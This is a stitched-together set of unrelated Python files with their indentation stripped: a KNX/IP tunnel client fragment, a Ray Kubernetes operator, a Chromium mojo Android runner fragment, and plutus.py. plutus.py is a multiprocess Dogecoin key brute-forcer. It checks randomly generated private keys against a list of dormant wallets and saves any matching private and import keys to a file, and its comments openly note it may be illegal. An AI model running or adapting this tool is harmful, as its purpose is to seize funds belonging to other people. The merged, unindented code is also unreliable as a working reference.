local_ip = sock.getsockname()[0]
if self.data_server:
logging.info("Data server already running, not starting again")
else:
self.data_server = DataServer((local_ip, 0),
DataRequestHandler,
self)
dummy_ip, self.data_port = self.data_server.server_address
data_server_thread = threading.Thread(
target=self.data_server.serve_forever)
data_server_thread.daemon = True
data_server_thread.start()
logging.debug(
"Started data server on UDP port %s", self.data_port)
self.control_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.control_socket.bind((local_ip, 0))
self.control_socket.settimeout(timeout)
# Connect packet
frame = KNXIPFrame(KNXIPFrame.CONNECT_REQUEST)
# Control endpoint
body = []
        body.extend([0x08, 0x01])  # length 8 bytes, UDP
dummy_ip, port = self.control_socket.getsockname()
body.extend(ip_to_array(local_ip))
body.extend(int_to_array(port, 2))
# Data endpoint
        body.extend([0x08, 0x01])  # length 8 bytes, UDP
body.extend(ip_to_array(local_ip))
body.extend(int_to_array(self.data_port, 2))
#
body.extend([0x04, 0x04, 0x02, 0x00])
frame.body = body
try:
self.control_socket.sendto(bytes(frame.to_frame()),
(self.remote_ip, self.remote_port))
received = self.control_socket.recv(1024)
except socket.error:
self.control_socket.close()
self.control_socket = None
logging.error("KNX/IP gateway did not respond to connect request")
return False
        # Check if the response is a CONNECT_RESPONSE
r_sid = received[2] * 256 + received[3]
if r_sid == KNXIPFrame.CONNECT_RESPONSE:
self.channel = received[6]
status = received[7]
if status == 0:
hpai = received[8:10]
logging.debug("Connected KNX IP tunnel " +
"(Channel: {}, HPAI: {} {})".format(
self.channel, hpai[0], hpai[1]))
else:
logging.error("KNX IP tunnel connect error:" +
"(Channel: {}, Status: {})".format(
self.channel, status))
return False
else:
logging.error(
"Could not initiate tunnel connection, STI = {0:%s}", r_sid)
return False
self.connected = True
return True
def disconnect(self):
"""Disconnect an open tunnel connection"""
if self.connected and self.channel:
logging.debug("Disconnecting KNX/IP tunnel...")
frame = KNXIPFrame(KNXIPFrame.DISCONNECT_REQUEST)
frame.body = self.hpai_body()
            # TODO: Incrementing the sequence number is probably not necessary
            # on the control channel during disconnect???
if self.seq < 0xff:
self.seq += 1
else:
self.seq = 0
self.control_socket.sendto(
bytes(frame.to_frame()), (self.remote_ip, self.remote_port))
            # TODO: Implement the Disconnect_Response handling from Gateway
# Control Channel > Client Control Channel
else:
logging.debug("Disconnect - no connection, nothing to do")
# Cleanup
if self.data_server is not None:
self.data_server.shutdown()
self.data_server = None
self.discovery_port = None
self.data_port = None
self.result_queue.queue.clear()
self.value_cache.clear()
self.ack_semaphore.release()
self.conn_state_ack_semaphore.release()
self.connection_state = 0
self.seq = 0
self.channel = None
self.connected = False
def check_connection_state(self):
"""Check the state of the connection using connection state request.
This sends a CONNECTION_STATE_REQUEST. This method will only return
True, if the connection is established and no error code is returned
from the KNX/IP gateway
"""
if not self.connected:
self.connection_state = -1
return False
frame = KNXIPFrame(KNXIPFrame.CONNECTIONSTATE_REQUEST)
frame.body = self.hpai_body()
# Send maximum 3 connection state requests with a 10 second timeout
res = False
self.connection_state = 0
maximum_retry = 3
for retry_counter in range(0, maximum_retry):
logging.debug("Heartbeat: Send connection state request")
# Suggestion:
# Carve the Control Socket out of the KNXIPTunnel
# Class and Public only the Send and Receive
# function and Implement in there the Heartbeat so we
# can block when other Functions want to send
            self.control_socket.settimeout(10)  # Kind of a quirk
try:
self.control_socket.sendto(bytes(frame.to_frame()),
(self.remote_ip, self.remote_port))
receive = self.control_socket.recv(1024)
except socket.timeout:
logging.info("Heartbeat: No response, Retry Counter %d/%d",
retry_counter, maximum_retry)
                continue
frame = KNXIPFrame.from_frame(receive)
if frame.service_type_id == KNXIPFrame.CONNECTIONSTATE_RESPONSE:
if frame.body[1] == KNXIPFrame.E_NO_ERROR:
logging.debug("Heartbeat: Successful")
res = True
break
if frame.body[1] == KNXIPFrame.E_CONNECTION_ID:
logging.error(
"Heartbeat: Response No active "
"connection found for Channel:%d ", self.channel
)
if frame.body[1] == KNXIPFrame.E_DATA_CONNECTION:
logging.error(
"Heartbeat: Response Data Connection Error Response "
"for Channel:%d ", self.channel
)
                if frame.body[1] == KNXIPFrame.E_KNX_CONNECTION:
logging.error(
"Heartbeat: Response KNX Sub Network Error Response "
"for Channel:%d ", self.channel
)
else:
logging.error("Heartbeat: Invalid Response!")
if self.connection_state != 0:
logging.info("Heartbeat: Connection state was %s",
self.connection_state)
res = False
if not res:
if self.connection_state == 0:
self.connection_state = -1
self.disconnect()
return False
return True
def hpai_body(self):
""" Create a body with HPAI information.
This is used for disconnect and connection state requests.
"""
body = []
# ============ IP Body ==========
body.extend([self.channel]) # Communication Channel Id
        body.extend([0x00])  # Reserved
# =========== Client HPAI ===========
body.extend([0x08]) # HPAI Length
body.extend([0x01]) # Host Protocol
# Tunnel Client Socket IP
body.extend(ip_to_array(self.control_socket.getsockname()[0]))
# Tunnel Client Socket Port
body.extend(int_to_array(self.control_socket.getsockname()[1]))
return body
def send_tunnelling_request(self, cemi, auto_connect=True):
"""Sends a tunneling request based on the given CEMI data.
This method does not wait for an acknowledge or result frame.
"""
if not self.connected:
if auto_connect:
if not self.connect():
raise KNXException("KNX tunnel not reconnected")
else:
raise KNXException("KNX tunnel not connected")
frame = KNXIPFrame(KNXIPFrame.TUNNELING_REQUEST)
# Connection header see KNXnet/IP 4.4.6 TUNNELLING_REQUEST
body = [0x04, self.channel, self.seq, 0x00]
if self.seq < 0xff:
self.seq += 1
else:
self.seq = 0
body.extend(cemi.to_body())
frame.body = body
self.data_server.socket.sendto(
frame.to_frame(), (self.remote_ip, self.remote_port))
# See KNX specification 3.8.4 chapter 2.6 "Frame confirmation"
# Send KNX packet 2 times if not acknowledged and close
# the connection if no ack is received
res = self.ack_semaphore.acquire(blocking=True, timeout=1)
        # Resend the packet if not acknowledged after 1 second
if not res:
self.data_server.socket.sendto(
frame.to_frame(), (self.remote_ip, self.remote_port))
res = self.ack_semaphore.acquire(blocking=True, timeout=1)
        # Disconnect and reconnect if not acknowledged
if not res:
self.disconnect()
self.connect()
return res
def group_read(self, addr, use_cache=True, timeout=1):
"""Send a group read to the KNX bus and return the result."""
if use_cache:
res = self.value_cache.get(addr)
if res:
logging.debug(
"Got value of group address %s from cache: %s", addr, res)
return res
cemi = CEMIMessage()
cemi.init_group_read(addr)
with self._lock:
            # There might be old messages in the result queue, remove them
self.result_queue.queue.clear()
self.send_tunnelling_request(cemi)
# Wait for the result
try:
res = self.result_queue.get(block=True, timeout=timeout)
except queue.Empty:
return None
self.result_queue.task_done()
return res
def group_write(self, addr, data, dptsize=0):
"""Send a group write to the given address.
The method does not check if the address exists and the write request
is valid.
"""
cemi = CEMIMessage()
cemi.init_group_write(addr, data, dptsize)
with self._lock:
self.send_tunnelling_request(cemi)
# Workaround for lost KNX packets
if self._write_delay:
time.sleep(self._write_delay)
def group_toggle(self, addr, use_cache=True):
"""Toggle the value of an 1-bit group address.
If the object has a value != 0, it will be set to 0, otherwise to 1
"""
data = self.group_read(addr, use_cache)
if len(data) != 1:
problem = "Can't toggle a {}-octet group address {}".format(
len(data), addr)
logging.error(problem)
raise KNXException(problem)
if data[0] == 0:
self.group_write(addr, [1])
elif data[0] == 1:
self.group_write(addr, [0])
else:
problem = "Can't toggle group address {} as value is {}".format(
addr, data[0])
logging.error(problem)
raise KNXException(problem)
def register_listener(self, address, func):
"""Adds a listener to messages received on a specific address
If some KNX messages will be received from the KNX bus, this listener
will be called func(address, data).
There can be multiple listeners for a given address
"""
try:
listeners = self.address_listeners[address]
except KeyError:
listeners = []
self.address_listeners[address] = listeners
        if func not in listeners:
listeners.append(func)
return True
def unregister_listener(self, address, func):
"""Removes a listener function for a given address
Remove the listener for the given address. Returns true if the listener
was found and removed, false otherwise
"""
        listeners = self.address_listeners.get(address)
        if listeners is None:
            return False
if func in listeners:
listeners.remove(func)
return True
return False
def received_message(self, address, data):
"""Process a message received from the KNX bus."""
self.value_cache.set(address, data)
if self.notify:
self.notify(address, data)
try:
listeners = self.address_listeners[address]
except KeyError:
listeners = []
for listener in listeners:
listener(address, data)
class DataRequestHandler(SocketServer.BaseRequestHandler):
"""The class that handles incoming UDP packets from the KNX/IP tunnel."""
def handle(self):
"""Process an incoming package."""
data = self.request[0]
sock = self.request[1]
frame = KNXIPFrame.from_frame(data)
if frame.service_type_id == KNXIPFrame.TUNNELING_REQUEST:
req = KNXTunnelingRequest.from_body(frame.body)
msg = CEMIMessage.from_body(req.cemi)
send_ack = False
tunnel = self.server.tunnel
if msg.code == 0x29:
# LData.req
send_ack = True
elif msg.code == 0x2e:
# LData.con
send_ack = True
else:
problem = "Unimplemented cEMI message code {}".format(msg.code)
logging.error(problem)
raise KNXException(problem)
# Cache data
if (msg.cmd == CEMIMessage.CMD_GROUP_WRITE) or (
msg.cmd == CEMIMessage.CMD_GROUP_RESPONSE):
# saw a value for a group address on the bus
tunnel.received_message(msg.dst_addr, msg.data)
# Put RESPONSES into the result queue
if msg.cmd == CEMIMessage.CMD_GROUP_RESPONSE:
tunnel.result_queue.put(msg.data)
if send_ack:
bodyack = [0x04, req.channel, req.seq, E_NO_ERROR]
ack = KNXIPFrame(KNXIPFrame.TUNNELLING_ACK)
ack.body = bodyack
sock.sendto(ack.to_frame(), self.client_address)
elif frame.service_type_id == KNXIPFrame.TUNNELLING_ACK:
logging.debug("Received tunneling ACK")
self.server.tunnel.ack_semaphore.release()
elif frame.service_type_id == KNXIPFrame.DISCONNECT_RESPONSE:
logging.debug("Disconnected")
            tunnel = self.server.tunnel
            tunnel.channel = None
tunnel.data_server.shutdown()
tunnel.data_server = None
elif frame.service_type_id == KNXIPFrame.CONNECTIONSTATE_RESPONSE:
logging.debug("Connection state response")
tunnel.connection_state = frame.body[2]
else:
logging.info(
"Message type %s not yet implemented", frame.service_type_id)
class DataServer(SocketServer.ThreadingMixIn, SocketServer.UDPServer):
"""Server that handled the UDP connection to the KNX/IP tunnel."""
def __init__(self, server_address, RequestHandlerClass, tunnel):
super(DataServer, self).__init__(server_address, RequestHandlerClass)
self.tunnel = tunnel
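# A minimal usage sketch (an assumption, not part of the original module):
# open a tunnel to a KNX/IP gateway, switch a 1-bit group address on and read
# it back. The gateway IP and group address 0x0903 are only illustrative.
def _example_tunnel_usage():
    tunnel = KNXIPTunnel("192.168.1.10")   # use "0.0.0.0" to auto-discover
    if not tunnel.connect():
        raise KNXException("Could not connect to the KNX/IP gateway")
    tunnel.group_write(0x0903, [1])        # write: e.g. switch a light on
    value = tunnel.group_read(0x0903)      # read back (may be served from cache)
    tunnel.disconnect()
    return value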
|
plutus.py
|
# Plutus Bitcoin Brute Forcer
# Made by Isaac Delly
# https://github.com/Isaacdelly/Plutus
# Added fastecdsa - June 2019 - Ian McMurray
# Program adjustment to work on Dogecoin Dormant Wallets - May 2021 - LongWayHomie
# Main idea is to look for private keys to lost wallets of Dogecoin. List has been created with dormant (not active, probably lost) wallets since 2014
# It's kind of impossible, but why not?
# much wow very sneaky so smart such (ill)legal
import os
import hashlib
import time
import pickle
import binascii
import multiprocessing
from fastecdsa import keys, curve
def generate_private_key():
"""Generate a random 32-byte hex integer which serves as a randomly generated Bitcoin private key.
Average Time: 0.0000061659 seconds
"""
return binascii.hexlify(os.urandom(32)).decode('utf-8').upper()
def private_key_to_public_key(private_key):
"""Accept a hex private key and convert it to its respective public key. Because converting a private key to
a public key requires SECP256k1 ECDSA signing, this function is the most time consuming and is a bottleneck
in the overall speed of the program.
Average Time: 0.0016401287 seconds
"""
# get the public key corresponding to the private key we just generated
c = int('0x%s'%private_key,0)
d = keys.get_public_key(c, curve.secp256k1)
return '04%s%s'%('{0:x}'.format(int(d.x)), '{0:x}'.format(int(d.y)))
def public_key_to_address(public_key):
"""Accept a public key and convert it to its resepective P2PKH wallet address.
Average Time: 0.0000801390 seconds
"""
#print('Wanting to [%s] this to address'%public_key)
output = []; alphabet = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
var = hashlib.new('ripemd160')
try:
var.update(hashlib.sha256(binascii.unhexlify(public_key.encode())).digest())
var = '1E' + var.hexdigest() + hashlib.sha256(hashlib.sha256(binascii.unhexlify(('1E' + var.hexdigest()).encode())).digest()).hexdigest()[0:8] #changed bit from 00 to 1E to generate Dogecoin public address
count = [char != '0' for char in var].index(True) // 2
n = int(var, 16)
while n > 0:
n, remainder = divmod(n, 58)
output.append(alphabet[remainder])
for i in range(count): output.append(alphabet[0])
return ''.join(output[::-1])
except:
# Nothing
return -1
def process(private_key, public_key, address, database):
"""Accept an address and query the database. If the address is found in the database, then it is assumed to have a
balance and the wallet data is written to the hard drive. If the address is not in the database, then it is
assumed to be empty and printed to the user. This is a fast and efficient query.
Average Time: 0.0000026941 seconds
"""
    if address in database[0]:  # database is a list holding one set of addresses
with open('much_money.txt', 'a') as file:
file.write('hex private key: ' + str(private_key) + '\n' +
'public key: ' + str(public_key) + '\n' +
'address: ' + str(address) + '\n\n' +
'WIF private key: ' + str(private_key_to_WIF(private_key)) + '\n') #WIF private key generation enabled again
else:
#TODO: counter so I wont get epilepsy from falling addresses
#print("Guesses per sec: " + float(num_tried) / elapsed_time)
print("Dogecoin Wallet: " + str(address))
#print("Dogecoin Wallet: " + str(address) + " " + str(private_key_to_WIF(private_key))) #debug to check if generated WIF is working fine for generated address
def private_key_to_WIF(private_key):
"""Convert the hex private key into Wallet Import Format for easier wallet importing. This function is
only called if a wallet with a balance is found. Because that event is rare, this function is not significant
to the main pipeline of the program and is not timed.
"""
var = hashlib.sha256(binascii.unhexlify(hashlib.sha256(binascii.unhexlify('9E' + private_key)).hexdigest())).hexdigest() #changed 80 to 9E for dogecoin WIF address
var = binascii.unhexlify('9E' + private_key + var[0:8]) #changed 80 to 9E for dogecoin WIF address
alphabet = chars = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
value = pad = 0; result = ''
for i, c in enumerate(var[::-1]): value += 256**i * c
while value >= len(alphabet):
div, mod = divmod(value, len(alphabet))
result, value = chars[mod] + result, div
result = chars[value] + result
for c in var:
if c == 0: pad += 1
else: break
return chars[0] * pad + result
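# A minimal usage sketch (an assumption, not part of the original script): run
# a single key through the full pipeline. The address and WIF strings come out
# Dogecoin-formatted because of the 0x1E / 0x9E version bytes used above.
def _example_single_key():
    private_key = generate_private_key()                # 64 hex characters
    public_key = private_key_to_public_key(private_key)
    address = public_key_to_address(public_key)         # P2PKH address ('D...')
    wif = private_key_to_WIF(private_key)
    return private_key, public_key, address, wif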
def main(database):
"""Create the main pipeline by using an infinite loop to repeatedly call the functions, while utilizing
multiprocessing from __main__. Because all the functions are relatively fast, it is better to combine
them all into one process.
"""
while True:
private_key = generate_private_key() # 0.0000061659 seconds
public_key = private_key_to_public_key(private_key) # 0.0016401287 seconds
address = public_key_to_address(public_key) # 0.0000801390 seconds
if address != -1:
process(private_key, public_key, address, database) # 0.0000026941 seconds
# --------------------
# 0.0017291287 seconds
if __name__ == '__main__':
"""Deserialize the database and read into a list of sets for easier selection and O(1) complexity. Initialize
the multiprocessing to target the main function with cpu_count() concurrent processes. """
    database = [set(line.strip() for line in open('database/dormant_list'))]
print('==================================')
print('DOGECOIN DORMANT WALLET AND RICH LIST COLLIDER')
print('based on Plutus from IsaacDelly and implementation of fastecdsa imcMurray')
print('Adjustment to Dogecoin done by LongWayHomie')
print('==================================')
print(' ▄ ▄ ')
print(' ▌▒█ ▄▀▒▌ ')
print(' ▌▒▒█ ▄▀▒▒▒▐ ')
print(' ▐▄█▒▒▀▀▀▀▄▄▄▀▒▒▒▒▒▐ ')
print(' ▄▄▀▒▒▒▒▒▒▒▒▒▒▒█▒▒▄█▒▐ ')
print(' ▄▀▒▒▒░░░▒▒▒░░░▒▒▒▀██▀▒▌ ')
print(' ▐▒▒▒▄▄▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▀▄▒▌ ')
print(' ▌░░▌█▀▒▒▒▒▒▄▀█▄▒▒▒▒▒▒▒█▒▐ ')
print(' ▐░░░▒▒▒▒▒▒▒▒▌██▀▒▒░░░▒▒▒▀▄▌ ')
print(' ▌░▒▒▒▒▒▒▒▒▒▒▒▒▒▒░░░░░░▒▒▒▒▌ ')
print('▌▒▒▒▄██▄▒▒▒▒▒▒▒▒░░░░░░░░▒▒▒▐ ')
print('▐▒▒▐▄█▄█▌▒▒▒▒▒▒▒▒▒▒░▒░▒░▒▒▒▒▌')
print('▐▒▒▐▀▐▀▒▒▒▒▒▒▒▒▒▒▒▒▒░▒░▒░▒▒▐ ')
print(' ▌▒▒▀▄▄▄▄▄▄▒▒▒▒▒▒▒▒░▒░▒░▒▒▒▌ ')
print(' ▐▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒▒░▒░▒▒▄▒▒▐ ')
print(' ▀▄▒▒▒▒▒▒▒▒▒▒▒▒▒░▒░▒▄▒▒▒▒▌ ')
print(' ▀▄▒▒▒▒▒▒▒▒▒▒▄▄▄▀▒▒▒▒▄▀ ')
print(' ▀▄▄▄▄▄▄▀▀▀▒▒▒▒▒▄▄▀ ')
print(' ▀▀▀▀▀▀▀▀▀▀▀▀ ')
print('Dogecoin list of wallets loaded')
time.sleep(5)
print('Executing...')
for cpu in range(multiprocessing.cpu_count()):
multiprocessing.Process(target = main, args = (database, )).start()
|
operator.py
|
import logging
import multiprocessing as mp
import os
import time
import threading
from typing import Any
from typing import Callable
from typing import Dict
from typing import Tuple
from typing import Optional
from kubernetes.client.exceptions import ApiException
import yaml
import ray.autoscaler._private.monitor as monitor
from ray._private import services
from ray.autoscaler._private import commands
from ray.ray_operator import operator_utils
from ray.ray_operator.operator_utils import AUTOSCALER_RETRIES_FIELD
from ray.ray_operator.operator_utils import STATUS_AUTOSCALING_EXCEPTION
from ray.ray_operator.operator_utils import STATUS_ERROR
from ray.ray_operator.operator_utils import STATUS_RUNNING
from ray.ray_operator.operator_utils import STATUS_UPDATING
from ray import ray_constants
logger = logging.getLogger(__name__)
# Queue to process cluster status updates.
cluster_status_q = mp.Queue() # type: mp.Queue[Tuple[str, str, str]]
class RayCluster():
"""Manages an autoscaling Ray cluster.
Attributes:
config: Autoscaling configuration dict.
subprocess: The subprocess used to create, update, and monitor the
Ray cluster.
"""
def __init__(self, config: Dict[str, Any]):
self.config = config
self.name = self.config["cluster_name"]
self.namespace = self.config["provider"]["namespace"]
# Make directory for configs of clusters in the namespace,
# if the directory doesn't exist already.
namespace_dir = operator_utils.namespace_dir(self.namespace)
if not os.path.isdir(namespace_dir):
os.mkdir(namespace_dir)
self.config_path = operator_utils.config_path(
cluster_namespace=self.namespace, cluster_name=self.name)
# Tracks metadata.generation field of associated custom resource.
# K8s increments this field whenever the spec of the custom resource is
# updated.
self._generation = 0
# Tracks metadata.labels.autoscalerRetries field of the CR.
# The operator increments this field whenever we attempt recovery from
# autoscaler failure.
self._num_retries = 0
# Monitor subprocess
self.subprocess = None # type: Optional[mp.Process]
# Monitor logs for this cluster will be prefixed by the monitor
# subprocess name:
self.subprocess_name = ",".join([self.name, self.namespace])
self.monitor_stop_event = mp.Event()
self.setup_logging()
def create_or_update(self, restart_ray: bool = False) -> None:
""" Create/update the Ray Cluster and run the monitoring loop, all in a
subprocess.
The main function of the Operator is managing the
subprocesses started by this method.
Args:
restart_ray: If True, restarts Ray to recover from failure.
"""
self.do_in_subprocess(self._create_or_update, args=(restart_ray, ))
def _create_or_update(self, restart_ray: bool = False) -> None:
try:
self.start_head(restart_ray=restart_ray)
self.start_monitor()
except Exception:
# Report failed autoscaler status to trigger cluster restart.
cluster_status_q.put((self.name, self.namespace,
STATUS_AUTOSCALING_EXCEPTION))
# `status_handling_loop` will increment the
# `status.AutoscalerRetries` of the CR. A restart will trigger
# at the subsequent "MODIFIED" event.
raise
def start_head(self, restart_ray: bool = False) -> None:
self.write_config()
# Don't restart Ray on head unless recovering from failure.
no_restart = not restart_ray
# Create or update cluster head and record config side effects.
self.config = commands.create_or_update_cluster(
self.config_path,
override_min_workers=None,
override_max_workers=None,
no_restart=no_restart,
restart_only=False,
yes=True,
no_config_cache=True,
no_monitor_on_head=True)
# Write the resulting config for use by the autoscaling monitor:
self.write_config()
def start_monitor(self) -> None:
"""Runs the autoscaling monitor."""
ray_head_pod_ip = commands.get_head_node_ip(self.config_path)
port = operator_utils.infer_head_port(self.config)
redis_address = services.address(ray_head_pod_ip, port)
self.mtr = monitor.Monitor(
redis_address=redis_address,
autoscaling_config=self.config_path,
redis_password=ray_constants.REDIS_DEFAULT_PASSWORD,
prefix_cluster_info=True,
stop_event=self.monitor_stop_event)
self.mtr.run()
def do_in_subprocess(self, f: Callable[[], None], args: Tuple) -> None:
# First stop the subprocess if it's alive
self.clean_up_subprocess()
# Reinstantiate process with f as target and start.
self.subprocess = mp.Process(
name=self.subprocess_name, target=f, args=args, daemon=True)
self.subprocess.start()
def clean_up_subprocess(self):
"""
Clean up the monitor process.
Executed when CR for this cluster is "DELETED".
Executed when Autoscaling monitor is restarted.
"""
if self.subprocess and self.subprocess.is_alive():
# Triggers graceful stop of the monitor loop.
self.monitor_stop_event.set()
self.subprocess.join()
# Clears the event for subsequent runs of the monitor.
self.monitor_stop_event.clear()
def clean_up(self) -> None:
"""Executed when the CR for this cluster is "DELETED".
The key thing is to end the monitoring subprocess.
"""
self.clean_up_subprocess()
self.clean_up_logging()
self.delete_config()
def setup_logging(self) -> None:
"""Add a log handler which appends the name and namespace of this
cluster to the cluster's monitor logs.
"""
self.handler = logging.StreamHandler()
# Filter by subprocess name to get this cluster's monitor logs.
self.handler.addFilter(
lambda rec: rec.processName == self.subprocess_name)
# Lines start with "<cluster name>,<cluster namespace>:"
logging_format = ":".join(
[self.subprocess_name, ray_constants.LOGGER_FORMAT])
self.handler.setFormatter(logging.Formatter(logging_format))
operator_utils.root_logger.addHandler(self.handler)
def clean_up_logging(self) -> None:
operator_utils.root_logger.removeHandler(self.handler)
def set_config(self, config: Dict[str, Any]) -> None:
self.config = config
def write_config(self) -> None:
"""Write config to disk for use by the autoscaling monitor."""
with open(self.config_path, "w") as file:
yaml.dump(self.config, file)
def delete_config(self) -> None:
os.remove(self.config_path)
def set_generation(self, generation: int) -> None:
self._generation = generation
def set_num_retries(self, num_retries: int) -> None:
self._num_retries = num_retries
def get_generation(self) -> int:
return self._generation
def get_num_retries(self) -> int:
return self._num_retries
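# A minimal usage sketch (an assumption, not part of the operator itself):
# how the control loop below drives a RayCluster object for one custom
# resource. `cluster_config` would come from operator_utils.cr_to_config().
def _example_raycluster_lifecycle(cluster_config):
    cluster = RayCluster(cluster_config)
    cluster.create_or_update()                   # start head + autoscaling monitor
    cluster.create_or_update(restart_ray=True)   # recover from an autoscaler failure
    cluster.clean_up()                           # called when the CR is deleted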
# Maps ray cluster (name, namespace) pairs to RayCluster python objects.
ray_clusters = {} # type: Dict[Tuple[str, str], RayCluster]
def run_event_loop():
# Instantiate event stream.
if operator_utils.NAMESPACED_OPERATOR:
raycluster_cr_stream = operator_utils.namespaced_cr_stream(
namespace=operator_utils.OPERATOR_NAMESPACE)
else:
raycluster_cr_stream = operator_utils.cluster_scoped_cr_stream()
# Run control loop.
for event in raycluster_cr_stream:
cluster_cr = event["object"]
cluster_name = cluster_cr["metadata"]["name"]
cluster_namespace = cluster_cr["metadata"]["namespace"]
event_type = event["type"]
handle_event(event_type, cluster_cr, cluster_name, cluster_namespace)
def handle_event(event_type, cluster_cr, cluster_name, cluster_namespace):
# TODO: This only detects errors in the parent process and thus doesn't
# catch cluster-specific autoscaling failures. Fix that (perhaps at
# the same time that we eliminate subprocesses).
try:
cluster_action(event_type, cluster_cr, cluster_name, cluster_namespace)
except Exception:
log_prefix = ",".join(cluster_name, cluster_namespace)
if event_type in ["ADDED", "MODIFIED"]:
logger.exception(f"{log_prefix}: Error while updating RayCluster.")
cluster_status_q.put((cluster_name, cluster_namespace,
STATUS_ERROR))
elif event_type == "DELETED":
# Don't try to update CRD's status if the CRD is gone.
logger.exception(
f"Error while deleting RayCluster {cluster_name}.")
def cluster_action(event_type: str, cluster_cr: Dict[str, Any],
cluster_name: str, cluster_namespace: str) -> None:
cluster_config = operator_utils.cr_to_config(cluster_cr)
cluster_identifier = (cluster_name, cluster_namespace)
log_prefix = ",".join(cluster_identifier)
if event_type == "ADDED":
operator_utils.check_redis_password_not_specified(
cluster_config, cluster_identifier)
cluster_status_q.put((cluster_name, cluster_namespace,
STATUS_UPDATING))
ray_cluster = RayCluster(cluster_config)
# Track changes to the custom resource's spec field:
generation = cluster_cr["metadata"]["generation"]
ray_cluster.set_generation(generation)
logger.info(f"{log_prefix}: Launching cluster.")
ray_cluster.create_or_update()
ray_clusters[cluster_identifier] = ray_cluster
cluster_status_q.put((cluster_name, cluster_namespace, STATUS_RUNNING))
elif event_type == "MODIFIED":
ray_cluster = ray_clusters[cluster_identifier]
# Check metadata.generation to determine if there's a spec change.
current_generation = cluster_cr["metadata"]["generation"]
# Check metadata.labels.autoscalerRetries to see if we need to restart
# Ray processes.
status = cluster_cr.get("status", {})
autoscaler_retries = status.get(AUTOSCALER_RETRIES_FIELD, 0)
        # True if there's been a change to the spec of the custom resource,
# triggering an increment of metadata.generation:
spec_changed = current_generation > ray_cluster.get_generation()
# True if monitor has failed, triggering an increment of
# status.autoscalerRetries:
ray_restart_required = (autoscaler_retries >
ray_cluster.get_num_retries())
if ray_restart_required:
logger.error(f"{log_prefix}: Failed, restarting cluster.")
ray_cluster.set_num_retries(autoscaler_retries)
if spec_changed:
logger.info(f"{log_prefix}: Updating cluster.")
ray_cluster.set_generation(current_generation)
# Update if there's been a change to the spec or if we're attempting
# recovery from autoscaler failure.
if spec_changed or ray_restart_required:
cluster_status_q.put((cluster_name, cluster_namespace,
STATUS_UPDATING))
ray_cluster.set_config(cluster_config)
# Trigger Ray restart only if there's been a failure.
ray_cluster.create_or_update(restart_ray=ray_restart_required)
cluster_status_q.put((cluster_name, cluster_namespace,
STATUS_RUNNING))
elif event_type == "DELETED":
ray_cluster = ray_clusters[cluster_identifier]
ray_cluster.clean_up()
del ray_clusters[cluster_identifier]
def status_handling_loop():
while True:
cluster_name, cluster_namespace, phase = cluster_status_q.get()
try:
operator_utils.set_status(cluster_name, cluster_namespace, phase)
except Exception:
log_prefix = ",".join([cluster_name, cluster_namespace])
logger.exception(f"{log_prefix}: Error setting RayCluster status.")
def main() -> None:
# Run status-handling loop.
status_handler = threading.Thread(target=status_handling_loop, daemon=True)
status_handler.start()
# Make directory for Ray cluster configs
if not os.path.isdir(operator_utils.RAY_CONFIG_DIR):
os.mkdir(operator_utils.RAY_CONFIG_DIR)
while True:
# This outer loop waits for creation of a RayCluster CRD if it hasn't
# already been created.
try:
# Enter main event loop.
run_event_loop()
except ApiException as e:
if e.status == 404:
logger.warning("Waiting for creation of the RayCluster CRD")
time.sleep(5)
else:
logger.error("Failed to enter operator event loop.")
# Unforeseen startup error. Operator pod is
# likely to end up in a crash loop.
raise
if __name__ == "__main__":
main()
|
android.py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import atexit
import json
import logging
import os
import os.path
import subprocess
import sys
import threading
import time
import SimpleHTTPServer
import SocketServer
from mopy.config import Config
from mopy.paths import Paths
sys.path.insert(0, os.path.join(Paths().src_root, 'build', 'android'))
from pylib import android_commands
from pylib import constants
from pylib import forwarder
# Tags used by the mojo shell application logs.
LOGCAT_TAGS = [
'AndroidHandler',
'MojoFileHelper',
'MojoMain',
'MojoShellActivity',
'MojoShellApplication',
'chromium',
]
MOJO_SHELL_PACKAGE_NAME = 'org.chromium.mojo.shell'
class Context(object):
"""
  The context object used across multiple runs of the shell.
"""
def __init__(self, device, device_port):
self.device = device
self.device_port = device_port
class _SilentTCPServer(SocketServer.TCPServer):
"""
A TCPServer that won't display any error, unless debugging is enabled. This is
  useful because the client might stop while it is fetching a URL, which causes
spurious error messages.
"""
def handle_error(self, request, client_address):
"""
Override the base class method to have conditional logging.
"""
if logging.getLogger().isEnabledFor(logging.DEBUG):
super(_SilentTCPServer, self).handle_error(request, client_address)
def _GetHandlerClassForPath(base_path):
class RequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""
Handler for SocketServer.TCPServer that will serve the files from
|base_path| directory over http.
"""
def translate_path(self, path):
path_from_current = (
SimpleHTTPServer.SimpleHTTPRequestHandler.translate_path(self, path))
return os.path.join(base_path, os.path.relpath(path_from_current))
def log_message(self, *_):
"""
Override the base class method to disable logging.
"""
pass
return RequestHandler
def _ExitIfNeeded(process):
"""
Exits |process| if it is still alive.
"""
if process.poll() is None:
process.kill()
def _ReadFifo(context, fifo_path, pipe, on_fifo_closed, max_attempts=5):
"""
  Reads |fifo_path| on the device and writes the contents to |pipe|. Calls
|on_fifo_closed| when the fifo is closed. This method will try to find the
path up to |max_attempts|, waiting 1 second between each attempt. If it cannot
  find |fifo_path|, an exception will be raised.
"""
def Run():
def _WaitForFifo():
for _ in xrange(max_attempts):
if context.device.FileExistsOnDevice(fifo_path):
return
time.sleep(1)
if on_fifo_closed:
on_fifo_closed()
raise Exception("Unable to find fifo.")
_WaitForFifo()
stdout_cat = subprocess.Popen([constants.GetAdbPath(),
'shell',
'cat',
fifo_path],
stdout=pipe)
atexit.register(_ExitIfNeeded, stdout_cat)
stdout_cat.wait()
if on_fifo_closed:
on_fifo_closed()
thread = threading.Thread(target=Run, name="StdoutRedirector")
thread.start()
def PrepareShellRun(config):
"""
Returns a context allowing a shell to be run.
This will start an internal http server to serve mojo applications, forward a
local port on the device to this http server and install the current version
of the mojo shell.
"""
build_dir = Paths(config).build_dir
constants.SetOutputDirectort(build_dir)
httpd = _SilentTCPServer(('127.0.0.1', 0), _GetHandlerClassForPath(build_dir))
